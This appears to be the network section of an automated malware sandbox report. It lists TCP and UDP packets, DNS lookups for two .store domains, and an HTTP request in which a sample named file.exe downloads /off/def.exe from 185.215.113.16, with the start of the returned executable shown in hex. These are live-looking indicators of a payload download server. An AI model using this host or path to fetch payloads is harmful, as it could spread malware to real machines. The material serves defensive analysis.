Oct 27, 2024 12:13:22.386096001 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.386104107 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.386145115 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.386364937 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.386487961 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.386498928 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.386509895 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.386523008 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.386534929 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.386545897 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.386548996 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.386548996 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.386557102 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.386569023 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.386600018 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.386636019 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.386950016 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.386961937 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.386974096 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.386986017 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.386997938 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.387008905 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.387021065 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.387023926 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.387044907 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.387201071 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.387238979 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.387264967 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.387278080 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.387336969 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.387339115 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.387351036 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.387362957 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.387375116 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.387387991 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.387447119 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.387447119 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.387676001 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.387686968 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.387700081 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.387726068 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.387763023 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.387768030 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.387773991 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.387785912 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.387809038 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.387820959 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.387834072 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.387854099 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.387865067 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.387871027 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.387902021 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.388350010 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.388365984 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.388377905 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.388389111 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.388401031 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.388401031 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.388411999 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.388422966 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.388425112 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.388434887 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.388447046 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.388449907 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.388457060 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.388468027 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.388472080 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.388488054 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.388521910 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.388895988 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.388906956 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.388917923 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.388930082 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.388941050 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.388951063 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.388962984 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.388962984 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.388962984 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.389012098 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.389188051 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.389202118 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.389216900 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.389228106 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.389239073 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.389242887 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.389249086 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.389261961 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.389261961 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.389282942 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.389302969 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.389302969 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.389509916 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.389520884 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.389537096 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.389548063 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.389559031 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.389575958 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.389581919 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.389581919 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.389588118 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.389592886 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.389600992 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.389667988 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.389851093 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.389861107 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.389872074 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.389883995 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.389900923 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.389909983 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.389909983 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.389913082 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.389925003 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.389935017 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.389935970 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.389947891 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.389959097 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.389985085 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.390321970 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.390332937 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.390343904 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.390356064 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.390366077 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.390377998 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.390386105 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.390391111 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.390407085 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.390412092 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.390419960 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.390424967 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.390449047 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.390603065 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.390621901 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.390640020 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.390667915 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.390681982 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.390685081 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.390691996 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.390737057 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.390737057 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.390944958 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.390955925 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.390965939 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.390980959 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.390986919 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.390986919 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.390994072 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.391000032 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.391022921 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.391041040 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.391221046 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.391232967 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.391242981 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.391254902 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.391266108 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.391267061 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.391297102 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.391460896 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.391473055 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.391484022 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.391494989 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.391503096 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.391508102 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.391521931 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.391525984 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.391567945 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.391772032 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.391783953 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.391793966 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.391803980 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.391815901 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.391822100 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.391827106 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.391836882 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.391855001 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.391855955 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.391860962 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.391870975 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.391870975 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.391901016 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.392076969 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.392113924 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.392119884 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.392126083 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.392170906 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.392260075 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.392265081 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.392272949 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.392280102 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.392308950 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.392343044 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.392432928 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.392442942 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.392455101 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.392472029 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.392484903 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.392489910 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.392494917 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.392507076 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.392518044 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.392529964 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.392548084 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.392548084 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.392792940 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.392805099 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.392838001 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.395273924 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.395335913 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.430150032 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.435781956 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.435801029 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.435811996 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.435830116 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.435839891 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.435842037 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.435853004 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.435864925 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.435875893 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.435888052 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.435888052 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.435911894 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.436018944 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.436031103 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.436041117 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.436064959 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.436181068 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.436192989 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.436204910 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.436229944 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.436242104 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.436252117 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.436254025 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.436254025 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.436263084 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.436280012 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.436291933 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.436301947 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.436307907 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.436307907 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.436346054 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.436609030 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.436621904 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.436631918 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.436651945 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.436693907 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.436813116 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.436825037 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.436836004 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.436846972 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.436857939 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.436868906 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.436875105 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.436880112 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.436891079 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.436903000 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.436912060 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.436912060 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.436929941 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.437119007 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.437129021 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.437146902 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.437158108 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.437170029 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.437170982 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.437181950 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.437205076 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.437205076 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.487235069 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.487791061 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.489017010 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:24.487581015 CET	49712	80	192.168.2.5	185.215.113.16

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 27, 2024 12:13:02.708651066 CET	60910	53	192.168.2.5	1.1.1.1
Oct 27, 2024 12:13:02.720973969 CET	53	60910	1.1.1.1	192.168.2.5
Oct 27, 2024 12:13:02.728106022 CET	61040	53	192.168.2.5	1.1.1.1
Oct 27, 2024 12:13:02.742887020 CET	53	61040	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 27, 2024 12:13:02.708651066 CET	192.168.2.5	1.1.1.1	0x427e	Standard query (0)	presticitpo.store	A (IP address)	IN (0x0001)	false
Oct 27, 2024 12:13:02.728106022 CET	192.168.2.5	1.1.1.1	0x94a5	Standard query (0)	crisiwarny.store	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 27, 2024 12:13:02.720973969 CET	1.1.1.1	192.168.2.5	0x427e	Name error (3)	presticitpo.store	none	none	A (IP address)	IN (0x0001)	false
Oct 27, 2024 12:13:02.742887020 CET	1.1.1.1	192.168.2.5	0x94a5	No error (0)	crisiwarny.store		104.21.95.91	A (IP address)	IN (0x0001)	false
Oct 27, 2024 12:13:02.742887020 CET	1.1.1.1	192.168.2.5	0x94a5	No error (0)	crisiwarny.store		172.67.170.64	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

crisiwarny.store

185.215.113.16

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49712	185.215.113.16	80	1400	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 12:13:15.929804087 CET	200	OUT	GET /off/def.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: 185.215.113.16
Oct 27, 2024 12:13:16.838331938 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 27 Oct 2024 11:13:16 GMT Content-Type: application/octet-stream Content-Length: 2720768 Last-Modified: Sun, 27 Oct 2024 10:07:55 GMT Connection: keep-alive ETag: "671e10fb-298400" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 00 2a 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 2a 00 00 04 00 00 3f 26 2a 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@z!L!This program cannot be run in DOS mode.$PELP(,e"0$* `@ @?&`Ui` @ @.rsrc`2@.idata 8@lckjivxs@)"):@pqfzdyos )\)@.taggant@*"b)@
Oct 27, 2024 12:13:16.838423014 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Oct 27, 2024 12:13:16.838460922 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Oct 27, 2024 12:13:16.838584900 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Oct 27, 2024 12:13:16.838620901 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Oct 27, 2024 12:13:16.838658094 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
